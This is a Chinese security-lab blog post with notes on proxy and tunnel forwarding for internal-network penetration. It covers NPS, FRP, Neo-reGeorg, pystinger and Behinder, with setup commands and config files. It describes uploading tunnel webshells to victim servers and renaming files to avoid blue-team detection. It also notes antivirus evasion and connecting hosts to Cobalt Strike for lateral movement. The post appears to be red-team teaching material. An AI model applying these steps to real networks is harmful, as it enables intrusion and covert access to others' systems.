咨詢服務(wù)熱線
400-6446-808
創(chuàng)安實驗室專欄
您的當(dāng)前位置:首頁 > 創(chuàng)安實驗室專欄

?+
+
內(nèi)網(wǎng)滲透-代理轉(zhuǎn)發(fā)筆記
在內(nèi)網(wǎng)滲透中,分為出網(wǎng)和不出網(wǎng),不出網(wǎng)的意思是目標(biāo)應(yīng)用服務(wù)器與互聯(lián)網(wǎng)網(wǎng)絡(luò)不可達(dá),采用代理服務(wù)或映射web端口用于在互聯(lián)網(wǎng)上的交互。
●
https://github.com/ehang-io/nps/releases
準(zhǔn)備工作:一臺云vps,作為nps服務(wù)端
●
./nps install //安裝沒有權(quán)限的話,chmod 777 nps
●
安裝完成后,會在/etc/nps/conf目錄生成如下配置文件,進(jìn)行配置修改,修改默認(rèn)賬戶密碼,防止被攻擊利用。
/etc/nps/conf/nps.conf

●
會啟動一個web服務(wù),用配置好的端口,賬戶密碼訪問。
./nps start //運(yùn)行服務(wù)端,停止./nps stop

●
配置壓縮和加密,減少被攻擊危險


添加后,可查看到客戶端配置命令

●
./npc -server=47.XX.XX.xxx:8024 -vkey=hmqha8eove21cevu -type=tcp //linux npc.exe -server=47.XX.xX.xxx:8024 -vkey=hmqha8eove21cevu -type=tcp
//windows
運(yùn)行成功后(注意:低版本npc,修改為npc1,360不攔截,火絨會提示安裝攔截)

客戶端顯示在線,說明可以進(jìn)行代理了

●
在滲透中常用tcp端口轉(zhuǎn)發(fā)來訪問內(nèi)網(wǎng)主機(jī),用socks5進(jìn)行訪問內(nèi)網(wǎng)web服務(wù)等。
TCP

socks5
使用proxifier或瀏覽器代理插件,帶入內(nèi)網(wǎng)訪問內(nèi)部web



FRP(Fast Reverse Proxy)是一款簡單,好用,穩(wěn)定的隧道工具。FRP 使用Go語言開發(fā),它是一款高性能的反向代理應(yīng)用,可以輕松地進(jìn)行內(nèi)網(wǎng)穿透,對外網(wǎng)提供服務(wù)。FRP 支持TCP、UDP、KCP、HTTP、HTTPS等協(xié)議類型,并且支持Web服務(wù)根據(jù)域名進(jìn)行路由轉(zhuǎn)發(fā)。在進(jìn)行內(nèi)網(wǎng)滲透中,F(xiàn)RP是常用的一款隧道工具。
●
https://github.com/fatedier/frp/releases/tag/v0.46.1

●
同時上傳修改好的配置文件frps.ini到自己的VPS,如下進(jìn)行運(yùn)行
./frps -c frps.ini
[common]
bind_addr = 0.0.0.0 #綁定的ip,為本機(jī)
bind_port = 17000 #綁定的端口
dashboard_addr = 0.0.0.0 #管理地址
dashboard_port = 27500 #管理端口,可視化控制臺,http訪問
dashboard_user = root #管理的用戶名
dashboard_pwd = 1wsdfeew3!@1$# #管理用戶的密碼,盡量復(fù)雜一點,安全
token = 1q2w3e #客戶端服務(wù)端連接的密碼
heartbeat_timeout = 90 #心跳超時時間
max_pool_count = 5 #最大同時連接數(shù)
●
在獲取到shell時,修改文件名稱后再上傳,防止被藍(lán)隊發(fā)現(xiàn)。
常用端口映射和socks代理
frpc.exe -c frpc.ini
[common]
server_addr = 100.20.14.14
server_port = 17000 #服務(wù)器綁定的端口,和服務(wù)端bind_port對應(yīng)
token = 1q2w3e #連接的密碼,和服務(wù)端對應(yīng)
pool_count = 5
protocol = tcp #協(xié)議類型
health_check_type = tcp
health_check_interval_s = 100
#socks代理
[test]
remote_port = 10000 #代理的端口
plugin = socks5 #使用的協(xié)議
use_encryption = true #是否加密
use_compression = true
#端口映射
[test]
type=tcp
local_ip = 127.0.0.1 #本地ip地址
local_port = 3389 #要映射的本地端口
remote_port = 3389 #要映射的服務(wù)端端口
連接socks5代理端口10000,進(jìn)行檢查是否成功

Neo-reGeorg 是一個旨在積極重構(gòu) reGeorg 的項目,目的是:
● 提高可用性,避免特征檢測
● 提高 tunnel 連接安全性
● 提高傳輸內(nèi)容保密性
● 應(yīng)對更多的網(wǎng)絡(luò)環(huán)境場景下使用
1、生成隧道馬,將隧道馬上傳至服務(wù)器web目錄
python neoreg.py generate -k password
2、使用 neoreg.py 連接WEB服務(wù)器,在本地建立socks5代理
python3 neoreg.py -k password -u http://xx/tunnel.php

3、socks5客戶端連接,默認(rèn)127.0.0.1:1080

毒刺(pystinger)通過webshell實現(xiàn)內(nèi)網(wǎng)SOCK4正向代理,端口映射.
可直接用于metasploit-framework,viper,cobalt strike上線.
主體使用python開發(fā),當(dāng)前支持php,jsp(x),aspx三種代理腳本.
https://github.com/FunnyWolf/pystinger
1、將隧道shell,服務(wù)端上傳至受害機(jī)
start stinger_server.exe 0.0.0.0 #注:必須設(shè)置為0.0.0.0,否則無法成功!
2、運(yùn)行客戶端
./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 #只需替換-w的參數(shù)url
3、上線CS機(jī)器
在對不出網(wǎng)段中的其他內(nèi)網(wǎng)主機(jī)進(jìn)行橫向移動上線時,可執(zhí)行完以上操作后在CobaltStrike創(chuàng)建一個Listener,HTTP Hosts填192.168.59.133(即受害機(jī)內(nèi)網(wǎng)IP),HTTP Port填60020

socks代理的端口不是開在遠(yuǎn)程服務(wù)器上的,是開在本地的,利用socks客戶端直接連接本地IP的代理端口即可,冰蝎會把本地端口的流量通過http隧道透傳至遠(yuǎn)程服務(wù)器網(wǎng)絡(luò)。
內(nèi)網(wǎng)穿透功能,配置socks隧道,本地IP、端口代理。

E·N·D
本文由創(chuàng)信華通創(chuàng)安實驗室編輯。
本文僅限于個人學(xué)習(xí)和技術(shù)研究,由于傳播、利用此文所提供的信息而造成刑事案件、非授權(quán)攻擊等違法行為,均由使用者本人負(fù)責(zé),本單位不為此承擔(dān)任何責(zé)任。創(chuàng)安攻防實驗室擁有對此文章的修改和解釋權(quán),如欲轉(zhuǎn)載或傳播此文章,必須保證此文章的完整性,包括版權(quán)聲明等全部內(nèi)容。
如有侵權(quán),請聯(lián)系后臺。
●
創(chuàng)安實驗室
創(chuàng)信華通創(chuàng)安實驗室,是成都創(chuàng)信華通信息技術(shù)有限公司旗下的技術(shù)研究團(tuán)隊,成立于2021年9月,主要研究紅藍(lán)對抗、重大安全保障、應(yīng)急響應(yīng)等方向。
創(chuàng)安攻防實驗室圓滿完成了多次公安舉辦的重要網(wǎng)絡(luò)安全保障和攻防演習(xí)活動,并積極參加各類網(wǎng)絡(luò)安全競賽,屢獲殊榮。
創(chuàng)安攻防實驗室秉承創(chuàng)信華通的發(fā)展理念,致力打造國內(nèi)一流網(wǎng)絡(luò)安全團(tuán)隊。
